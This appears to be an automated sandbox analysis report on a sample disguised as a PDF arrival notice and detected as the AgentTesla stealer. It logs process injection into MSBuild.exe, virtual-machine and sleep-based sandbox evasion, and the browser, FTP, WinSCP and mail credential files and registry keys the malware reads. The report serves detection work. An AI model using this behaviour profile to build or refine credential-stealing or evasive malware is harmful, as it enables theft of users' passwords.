Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Found evasive API chain (trying to detect sleep duration tampering with parallel thread)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

Function Chain: systemQueried,systemQueried,threadDelayed,threadCreated,threadResumed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,systemQueried,threadDelayed,threadDelayed,systemQueried,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

Window / User API: threadDelayed 557

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 1724	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 1724	Thread sleep time: -3270000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 1724	Thread sleep time: -149450s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 1724	Thread sleep time: -269019s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 1724	Thread sleep time: -89721s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 1724	Thread sleep time: -328966s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 1724	Thread sleep time: -686757s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 1724	Thread sleep time: -298600s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 1724	Thread sleep time: -59718s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 1724	Thread sleep time: -150000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 1724	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 1724	Thread sleep time: -60048s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 1724	Thread sleep time: -30141s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 1724	Thread sleep time: -40062s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 1724	Thread sleep time: -38844s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 1724	Thread sleep time: -59686s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 1724	Thread sleep time: -39562s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 1724	Thread sleep time: -39312s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Last function: Thread delayed

Source: MSBuild.exe, 00000003.00000002.481167503.0000000005D10000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: MSBuild.exe, 00000003.00000002.482772481.00000000078D0000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllN
Source: MSBuild.exe, 00000003.00000002.481167503.0000000005D10000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: MSBuild.exe, 00000003.00000002.481167503.0000000005D10000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: MSBuild.exe, 00000003.00000002.481167503.0000000005D10000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

Code function: 3_2_0558B078 LdrInitializeThunk,

3_2_0558B078

Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exe

0_2_000C215C

Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exe

0_2_000C215C

Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exe

0_2_000C215C

Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exe	Code function: 0_2_000B1970 mov eax, dword ptr fs:[00000030h]	0_2_000B1970
Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exe	Code function: 0_2_000B1970 mov eax, dword ptr fs:[00000030h]	0_2_000B1970
Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exe	Code function: 0_2_000D1CC2 mov eax, dword ptr fs:[00000030h]	0_2_000D1CC2
Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exe	Code function: 0_2_000D2688 mov eax, dword ptr fs:[00000030h]	0_2_000D2688
Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exe	Code function: 0_2_000D26C5 mov eax, dword ptr fs:[00000030h]	0_2_000D26C5
Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exe	Code function: 0_2_000D2728 mov eax, dword ptr fs:[00000030h]	0_2_000D2728

Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exe

Code function: 0_2_000BA5B8 GetProcessHeap,

0_2_000BA5B8

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exe	Code function: 0_2_000BF458 SetUnhandledExceptionFilter,		0_2_000BF458
Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exe	Code function: 0_2_000BF47B SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_000BF47B

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exe

Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe protection: execute and read and write

Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe base: E35008

Jump to behavior

Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exe

Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

Jump to behavior

Source: MSBuild.exe, 00000003.00000002.476151015.0000000001AD0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: MSBuild.exe, 00000003.00000002.476151015.0000000001AD0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: MSBuild.exe, 00000003.00000002.476151015.0000000001AD0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: MSBuild.exe, 00000003.00000002.476151015.0000000001AD0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exe

Code function: 0_2_000B9D61 cpuid

0_2_000B9D61

Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeW,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	0_2_000B4887
Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,	0_2_000BB34D
Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	0_2_000C0B91
Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	0_2_000C24BA
Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exe	Code function: EnumSystemLocalesEx,	0_2_000BF53A
Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exe	Code function: GetLocaleInfoEx,	0_2_000BF550
Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	0_2_000C159E
Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exe	Code function: GetLocaleInfoEx,__wcsnicmp,_TestDefaultCountry,_TestDefaultCountry,__invoke_watson,__invoke_watson,	0_2_000C275E
Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	0_2_000C0F9A

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exe

Code function: 0_2_000BBDE2 GetSystemTimeAsFileTime,GetCurrentThreadId,GetTickCount64,QueryPerformanceCounter,

0_2_000BBDE2

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000000.00000002.211934436.00000000000D3000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.474831985.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Arrivalnotice2020pdf.exe PID: 5492, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 2540, type: MEMORY
Source: Yara match	File source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Arrivalnotice2020pdf.exe.b0000.0.unpack, type: UNPACKEDPE

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior

Tries to harvest and steal ftp login credentials

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 00000003.00000002.477291193.0000000003401000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 2540, type: MEMORY

Remote Access Functionality:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000000.00000002.211934436.00000000000D3000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.474831985.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Arrivalnotice2020pdf.exe PID: 5492, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 2540, type: MEMORY
Source: Yara match	File source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Arrivalnotice2020pdf.exe.b0000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation211	DLL Side-Loading1	DLL Side-Loading1	Disable or Modify Tools11	OS Credential Dumping2	System Time Discovery1	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API11	Boot or Logon Initialization Scripts	Access Token Manipulation1	Deobfuscate/Decode Files or Information11	Input Capture11	System Information Discovery135	Remote Desktop Protocol	Data from Local System2	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Process Injection212	Obfuscated Files or Information2	Credentials in Registry1	Query Registry1	SMB/Windows Admin Shares	Email Collection1	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Software Packing1	NTDS	Security Software Discovery141	Distributed Component Object Model	Input Capture11	Scheduled Transfer	Application Layer Protocol12	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	DLL Side-Loading1	LSA Secrets	Virtualization/Sandbox Evasion13	SSH	Clipboard Data1	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Virtualization/Sandbox Evasion13	Cached Domain Credentials	Process Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Access Token Manipulation1	DCSync	Application Window Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Process Injection212	Proc Filesystem	Remote System Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	System Network Configuration Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Arrivalnotice2020pdf.exe	23%	Virustotal		Browse
Arrivalnotice2020pdf.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
3.2.MSBuild.exe.400000.0.unpack	100%	Avira	TR/Spy.Gen8		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
https://dBHeYNWtul3f.net	0%	Avira URL Cloud	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
